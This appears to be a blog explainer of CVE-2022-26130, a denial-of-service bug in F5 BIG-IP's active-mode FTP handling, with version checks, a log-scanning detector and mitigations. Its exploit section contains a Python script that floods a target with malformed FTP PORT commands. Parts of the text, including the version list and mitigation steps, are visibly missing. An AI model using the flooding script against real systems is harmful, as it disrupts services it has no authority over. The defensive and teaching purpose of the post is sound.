In early 2022, a significant vulnerability—CVE-2022-26130—was found in F5’s BIG-IP devices, commonly used by enterprises for load balancing and network management. This flaw may sound niche, but if your network uses FTP (File Transfer Protocol) "Active mode" through a BIG-IP virtual server, this bug could suddenly disconnect your users or services.

This post uses simple, straightforward language to explain what CVE-2022-26130 is, who’s affected, what the risk is, and how to check or mitigate it step by step. We’ll cover some background, give code snippets you can use to test your system, and walk through what an exploit might look like. This is an exclusive, long-form look—let’s get started.

What Is CVE-2022-26130?

CVE-2022-26130 is a denial-of-service (DoS) type vulnerability. It affects certain versions of F5 BIG-IP when handling "Active mode" FTP connections.

In Plain English:
If you set up BIG-IP to manage FTP connections using "Active Mode," certain types of network traffic can make the server just stop accepting FTP data channels—cutting off file transfers.

13.1.x versions before 13.1.5

> Note: Versions past end-of-support weren't evaluated—so if you’re running something even older, you could be at risk but aren’t officially covered.

Passive Mode: The client connects to the server for both "command" and "data" channels.

This bug happens only in Active Mode, which is often used for legacy equipment or certain application setups.

F5’s BIG-IP device lets administrators set up an "FTP profile" on a virtual server to handle FTP traffic properly. But with active mode enabled, undisclosed (i.e. technically unknown but possible-to-generate) traffic can break handling of the data channel.

Impact:
When the bug is triggered—intentionally by an attacker or accidentally—the virtual server stops processing active FTP data connections altogether. Your users can’t transfer files until you restart (or at least reconfigure) your BIG-IP service.

Original References

- F5 Security Advisory K15382123 (Official)
- National Vulnerability Database CVE-2022-26130 Entry

Organizations with virtual servers managing legacy applications.

- Service providers allowing FTP uploads/downloads via a BIG-IP load balancer.

Not at risk?
If you use only passive mode FTP, SFTP, or if you don’t use FTP at all, you’re unaffected.

How Could an Attacker Exploit This?

The exploit is a simple denial-of-service:
If an attacker knows your organization is using active-mode FTP through F5 BIG-IP, they can send crafted or even malformed FTP commands/sequences to your virtual server, causing it to stop accepting further active data connections.

Assume the attacker can connect to your FTP service. They could

# This is what an *honest* FTP client might do:
ftp> open ftp.targetdomain.com
# login as normal
ftp> put somefile.txt

But an attacker could automate sending malformed or repeated FTP PORT commands to exhaust or confuse the BIG-IP’s FTP profile:

import socket

def send_malformed_port(ip, port):
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect((ip, port))
    s.send(b'USER anonymous\r\n')
    s.send(b'PASS anon@\r\n')
    # PORT command for active mode, with bad parameters
    for i in range(100):  # rapid fire
        s.send(b'PORT 999,999,999,999,999,999\r\n')
    s.close()

# Use wisely, for testing on your own systems!
send_malformed_port('ftp.targetdomain.com', 21)

*(Don’t run this on any server you don’t own! This code is for demonstration.)*

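Unexpected traffic of this kind is what the vulnerable FTP profile fails to handle, and the result is that the virtual server can no longer manage active mode data channels. Because the triggering traffic is described only as undisclosed, the snippet above illustrates the class of input rather than a confirmed trigger.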

How to Check if You’re Vulnerable

Step 1: Check your BIG-IP version

SSH into your F5 device (or use the admin GUI) and run:

tmsh show /sys version

*Does the output show a version earlier than the fixed release for its branch: 16.1.2.2, 15.1.5.1, 14.1.4.6, or 13.1.5?*

Step 2: Check FTP Profile Settings

In the GUI under Local Traffic > Profiles > Services > FTP

Alternatively, via the command line:

tmsh list ltm profile ftp
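
To automate the version comparison from Step 1 across many devices, the following added example (not from F5 or the original post) parses saved `tmsh show /sys version` output and compares it against the fixed releases listed above. The sample output is constructed, and the function names are illustrative.

```python
import re

# Fixed releases named in this post, keyed by (major, minor) branch.
FIXED = {
    (16, 1): (16, 1, 2, 2),
    (15, 1): (15, 1, 5, 1),
    (14, 1): (14, 1, 4, 6),
    (13, 1): (13, 1, 5),
}

# Constructed sample of `tmsh show /sys version` output (not from a real device).
SAMPLE_OUTPUT = """\
Sys::Version
Main Package
  Product     BIG-IP
  Version     15.1.4.1
  Build       0.0.15
  Edition     Point Release 1
"""

def parse_version(tmsh_output):
    """Extract the dotted version from the 'Version' row as a tuple of ints."""
    m = re.search(r"^\s*Version\s+(\d+(?:\.\d+)+)\s*$", tmsh_output, re.MULTILINE)
    if not m:
        raise ValueError("no Version line found")
    return tuple(int(p) for p in m.group(1).split("."))

def pad(version, width=4):
    """Right-pad with zeros so 13.1.5 compares as 13.1.5.0."""
    return tuple(version) + (0,) * (width - len(version))

def assess(version):
    """Return 'vulnerable', 'fixed', or 'not-listed' for branches this post does not cover."""
    fixed = FIXED.get(tuple(version[:2]))
    if fixed is None:
        return "not-listed"
    return "vulnerable" if pad(version) < pad(fixed) else "fixed"

if __name__ == "__main__":
    v = parse_version(SAMPLE_OUTPUT)
    print(".".join(map(str, v)), assess(v))
```

A "not-listed" result covers branches the post does not name, including releases past end-of-support that were not evaluated; a vulnerable version only matters if the FTP profile check in Step 2 also applies.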

2. Switch to Passive Mode FTP (If Possible)

If you can make your applications use passive mode rather than active, this vulnerability won’t affect you.

3. Restrict FTP Access

Limit IP addresses allowed to access your FTP service.

4. Monitor

Set up monitoring to alert you if FTP uploads/downloads suddenly fail or drop to zero.
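
One way to build that monitoring, as an added example that is not part of the original post: the script below scans an FTP command log for clients sending malformed PORT arguments (checked against the RFC 959 format of six comma-separated values from 0 to 255) and counts data channel failures (425 replies) since the last completed transfer (226). The log format and sample lines are constructed assumptions; adapt the parsing to whatever your FTP server or proxy actually logs.

```python
import re
from collections import Counter

# Constructed sample lines in an assumed "<time> <client> <CMD|RSP> <text>" format.
SAMPLE_LOG = """\
2022-05-05T10:00:01Z 198.51.100.10 CMD PORT 198,51,100,10,195,80
2022-05-05T10:00:02Z 198.51.100.10 RSP 226 Transfer complete
2022-05-05T10:05:00Z 203.0.113.7 CMD PORT 999,999,999,999,999,999
2022-05-05T10:05:00Z 203.0.113.7 CMD PORT 999,999,999,999,999,999
2022-05-05T10:05:01Z 203.0.113.7 CMD PORT 999,999,999,999,999,999
2022-05-05T10:06:10Z 198.51.100.10 CMD PORT 198,51,100,10,195,81
2022-05-05T10:06:11Z 198.51.100.10 RSP 425 Can't open data connection
""".splitlines()

def parse_port_arg(arg):
    """Return (ip, port) for a well-formed RFC 959 PORT argument, else None."""
    fields = arg.strip().split(",")
    if len(fields) != 6 or not all(re.fullmatch(r"\d{1,3}", f) for f in fields):
        return None
    nums = [int(f) for f in fields]
    if any(n > 255 for n in nums):
        return None
    return ".".join(map(str, nums[:4])), nums[4] * 256 + nums[5]

def scan(lines, bad_port_threshold=3):
    """Flag clients sending malformed PORT commands and track transfer outcomes."""
    bad_ports, completed, failures_in_a_row = Counter(), 0, 0
    for line in lines:
        parts = line.split(None, 3)
        if len(parts) < 4:
            continue  # not in the assumed format
        _, client, kind, text = parts
        if kind == "CMD" and text.upper().startswith("PORT "):
            if parse_port_arg(text[5:]) is None:
                bad_ports[client] += 1
        elif kind == "RSP" and text.startswith("226"):  # transfer completed
            completed += 1
            failures_in_a_row = 0
        elif kind == "RSP" and text.startswith("425"):  # data channel failed
            failures_in_a_row += 1
    return {
        "malformed_port_clients": sorted(
            c for c, n in bad_ports.items() if n >= bad_port_threshold),
        "completed": completed,
        "failures_since_last_success": failures_in_a_row,
    }

if __name__ == "__main__":
    print(scan(SAMPLE_LOG))
```

Alert when `malformed_port_clients` is non-empty or when `failures_since_last_success` keeps climbing with no completed transfers in between.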

Real-World Exploit Example: A Timing Nightmare

Let’s say you run a business that receives automated files from outside customers every two hours. One day, a script-kiddie discovers your BIG-IP is an old version and floods your FTP with malformed active mode commands right before a big transfer.
Your service stops accepting data channel connections. Suddenly, your business can’t receive files—and you lose hours or even a day until someone restarts the virtual server.

That's the danger—simple, silent, and destructive.

Conclusion

CVE-2022-26130 might seem obscure, but in FTP-heavy or legacy environments, it’s a big deal. The fix is simple: upgrade your F5 BIG-IP, use passive mode if possible, and always restrict unnecessary access.

Further Reading

- F5 K15382123 - Security Advisory for CVE-2022-26130
- CVE-2022-26130 @ NVD

Disclaimer

This information is provided for responsible system administration and education. Testing should only be performed on systems you own or manage. Never use attack techniques on other organizations’ networks.

Timeline

Published on: 05/05/2022 17:15:00 UTC
Last modified on: 05/16/2022 12:34:00 UTC